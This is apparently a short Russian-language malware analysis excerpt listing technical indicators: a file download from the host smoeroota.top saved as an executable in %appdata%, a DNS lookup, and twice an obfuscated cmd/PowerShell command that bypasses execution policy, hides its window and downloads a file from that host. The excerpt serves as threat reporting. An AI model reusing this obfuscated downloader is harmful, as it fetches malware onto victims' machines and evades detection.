Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^We^r^SHe^LL.Ex^E -ex^ECUTIOn^POlic^Y^ Byp^AS^s -^nOPRo^FILe^ ^-^WI^n^DowStYLe^ HIdDEn ^(new-obj^ECt sysTEm.nET^.^WE^bclIE^nT).DOWn^LOAD^f^ilE^('http://smoeroota.top/read.ph...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "P^O^We^r^SHe^LL.Ex^E -ex^ECUTIOn^POlic^Y^ Byp^AS^s -^nOPRo^FILe^ ^-^WI^n^DowStYLe^ HIdDEn ^(new-obj^ECt sysTEm.nET^.^WE^bclIE^nT).DOWn^LOAD^f^ilE^('http://smoeroota.top/read.ph...' (со скрытым окном)